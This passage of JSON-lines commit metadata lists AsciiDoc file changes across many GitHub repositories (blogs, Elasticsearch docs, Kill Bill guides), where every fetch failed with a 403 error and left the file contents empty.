'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"390727184fdad1b50985181dcbee39e26bca90bd","subject":"overview started","message":"overview started\n","repos":"canoo\/dolphin-platform,canoo\/dolphin-platform,canoo\/dolphin-platform","old_file":"documentation\/src\/docs\/asciidoc\/overview.adoc","new_file":"documentation\/src\/docs\/asciidoc\/overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/canoo\/dolphin-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"750d4a3a5582f4841353dbbb9131911ff6a30969","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"350e04c54bb6f181055503b03c6178b15db6097f","subject":"Create README.adoc","message":"Create README.adoc","repos":"mibo\/apache-olingo-client,mibo\/apache-olingo-client","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mibo\/apache-olingo-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9feac850e8ac91fa89d510ce4b760f216b1730b9","subject":"Add README with build badge","message":"Add README with build badge\n\n[skip ci]\n","repos":"lassik\/respace,lassik\/respace","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/respace.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"01fc2a4f2b034905ff70a22a1951fc01f3755996","subject":"add cb austin","message":"add cb austin\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_austin.adoc","new_file":"content\/events\/2016\/clojurebridge_austin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"17876bec0dad5595c9cc4bc5ca228486c3394ea3","subject":"Update 2015-10-22-Arraylist-vs-Vector-in-Java.adoc","message":"Update 2015-10-22-Arraylist-vs-Vector-in-Java.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-22-Arraylist-vs-Vector-in-Java.adoc","new_file":"_posts\/2015-10-22-Arraylist-vs-Vector-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b56c11ca33cf21eee9430acdfa187727d94259","subject":"create post 4 Unique iPhone Accessories","message":"create post 4 Unique iPhone 
Accessories","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-4-Unique-iPhone-Accessories.adoc","new_file":"_posts\/2018-02-26-4-Unique-iPhone-Accessories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f2082356ad11120b45a48f04fbc228ea5cdf0f3","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"988733c11d08e44bcd1c3c7531fc11a64b81cdb6","subject":"Publish 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","message":"Publish 201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_file":"201-01-31-Puzzle-1-Please-call-my-A-P-Is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0501692f7bc6c6b69aec607c5b4f1f36cfd2709e","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a92f56b09f85c9f19421e504b9a36fe06fa6de4","subject":"y2b create post MKBHD buys a new mouse!","message":"y2b create post MKBHD buys a new mouse!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-01-07-MKBHD-buys-a-new-mouse.adoc","new_file":"_posts\/2015-01-07-MKBHD-buys-a-new-mouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8fd171e45dd3eff44fb3e9b20c31c04f8541e38","subject":"Update 2015-12-06-Big-Data-Configuration.adoc","message":"Update 
2015-12-06-Big-Data-Configuration.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-12-06-Big-Data-Configuration.adoc","new_file":"_posts\/2015-12-06-Big-Data-Configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6015318435de4660f0653ccefc1260437130a351","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"101ea0549a824e49c1ed6040408e9a96db6fdd0e","subject":"Add note about retention periods to reindex-upgrade docs","message":"Add note about retention periods to reindex-upgrade docs\n","repos":"LeoYao\/elasticsearch,glefloch\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,rlugojr\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,nilabhsagar\/elasticsearch,wuranbo\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,elasticdog\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,obourgain\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,wenpos\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,bawse\/elasticsearch,kalimatas\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,spiegela\/elasticsearch,i-am-Nathan\/elasticsearch,njlawton\/elasticsearch,liweinan0423\/elasticsearch,mjason3\/elasticsearch,geidies\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,nknize\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,jimczi\/elasticsearch,JervyShi\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,brandonkearby\/elasticsearch,jprante\/elast
icsearch,vroyer\/elasticassandra,njlawton\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,JSCooke\/elasticsearch,geidies\/elasticsearch,MaineC\/elasticsearch,qwerty4030\/elasticsearch,yanjunh\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,maddin2016\/elasticsearch,naveenhooda2000\/elasticsearch,henakamaMSFT\/elasticsearch,naveenhooda2000\/elasticsearch,i-am-Nathan\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,obourgain\/elasticsearch,spiegela\/elasticsearch,HonzaKral\/elasticsearch,JackyMai\/elasticsearch,nezirus\/elasticsearch,fforbeck\/elasticsearch,mikemccand\/elasticsearch,glefloch\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,uschindler\/elasticsearch,winstonewert\/elasticsearch,liweinan0423\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,bawse\/elasticsearch,JervyShi\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,yanjunh\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,elasticdog\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,artnowo\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,njlawton\/elasticsearch,pozhidaevak\/elasticsearch,yanjunh\/elasticsearch,mortonsykes\/elasticsearch,scottsom\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,gmarz\/elasticsearch,nezirus\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,brandonkearby\/elasticsearch,fforbeck\/elasticsearch,artnowo\/elasticsearch,pozhidaevak\/elasticsearch,Shepard1212\/elasticsearch,ZTE-PaaS\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,rajan
m\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,wuranbo\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,fred84\/elasticsearch,MaineC\/elasticsearch,JSCooke\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,fernandozhu\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,JervyShi\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,rlugojr\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,MisterAndersen\/elasticsearch,alexshadow007\/elasticsearch,gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,alexshadow007\/elasticsearch,winstonewert\/elasticsearch,MisterAndersen\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,C-Bish\/elasticsearch,C-Bish\/elasticsearch,nilabhsagar\/elasticsearch,rlugojr\/elasticsearch,mjason3\/elasticsearch,StefanGor\/elasticsearch,Shepard1212\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,scottsom\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,MaineC\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,lks21c\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,gmarz\/elasticsearch,jprante\/elasticsearch,liweinan0423\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,nazarewk\/elasticsearch,LeoYao\/elasticsearch,MaineC\/elasticsearch,Shepard1212\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,a2lin\/elasticsearch,naveenhooda2000\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,artnowo\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,HonzaKral\/elasticsearch,ZTE-PaaS\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch","old_file":"docs\/reference\/setup\/reindex_upgrade.asciidoc",
"new_file":"docs\/reference\/setup\/reindex_upgrade.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a71b8048729be09788805a1758d28c8f5e22ec3","subject":"\ud83d\ude80 Debezium 1.0 release announcement","message":"\ud83d\ude80 Debezium 1.0 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-12-18-debezium-1-0-0-final-released.adoc","new_file":"blog\/2019-12-18-debezium-1-0-0-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"700d246757e3c89c6895203c9ef23048c7cd3f18","subject":"Update 20161110-1347.adoc","message":"Update 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1347.adoc","new_file":"_posts\/20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0301474fccd044be669a92c67b69386b612217ef","subject":"hello spring data","message":"hello spring data\n","repos":"verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works","old_file":"data.adoc","new_file":"data.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fc9fa3afaf28f7e362eca2a9ab28b6f0dcd0e3cb","subject":"Added release notes for 5.0.0-alpha4","message":"Added release notes for 
5.0.0-alpha4\n","repos":"liweinan0423\/elasticsearch,JervyShi\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,Stacey-Gammon\/elasticsearch,artnowo\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,spiegela\/elasticsearch,pozhidaevak\/elasticsearch,girirajsharma\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,ricardocerq\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,dpursehouse\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,alexshadow007\/elasticsearch,zkidkid\/elasticsearch,strapdata\/elassandra5-rc,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,dongjoon-hyun\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,MaineC\/elasticsearch,nazarewk\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,fforbeck\/elasticsearch,C-Bish\/elasticsearch,artnowo\/elasticsearch,gingerwizard\/elasticsearch,yanjunh\/elasticsearch,palecur\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,gmarz\/elasticsearch,brandonkearby\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,liweinan0423\/elasticsearch,i-am-Nathan\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,rlugojr\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,zkidkid\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,cwurm\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,Shepard1212\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,sreeramjayan\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,avikurapati\/elasticsearch,alexshadow007\/elasticsearch,dongjoon-hyun\/elas
ticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,sreeramjayan\/elasticsearch,qwerty4030\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,scorpionvicky\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,awislowski\/elasticsearch,dpursehouse\/elasticsearch,i-am-Nathan\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,dongjoon-hyun\/elasticsearch,LewayneNaidoo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,Stacey-Gammon\/elasticsearch,yanjunh\/elasticsearch,ZTE-PaaS\/elasticsearch,masaruh\/elasticsearch,masaruh\/elasticsearch,StefanGor\/elasticsearch,fforbeck\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,alexshadow007\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,Shepard1212\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,C-Bish\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,gmarz\/elasticsearch,a2lin\/elasticsearch,Shepard1212\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra5-rc,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,wenpos\/elasticsearch,avikurapati\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,yanjunh\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,palecur\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,liweinan0423\/elasticsearch,fred84\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,awislowski\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,JackyMai\/elasticsearch,MisterAndersen\/elasticsearch,JSCooke\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra5-rc,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,palecur\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,MisterAndersen\/elasticsearch,cwurm\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,strapdata\/elassandra5-rc,obourgain\/elasticsearch,njlawton\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,gmarz\/elasticsearch,i-am-
Nathan\/elasticsearch,nezirus\/elasticsearch,glefloch\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,gfyoung\/elasticsearch,girirajsharma\/elasticsearch,zkidkid\/elasticsearch,vroyer\/elassandra,gmarz\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,IanvsPoplicola\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,avikurapati\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,dpursehouse\/elasticsearch,awislowski\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,bawse\/elasticsearch,nazarewk\/elasticsearch,sreeramjayan\/elasticsearch,i-am-Nathan\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\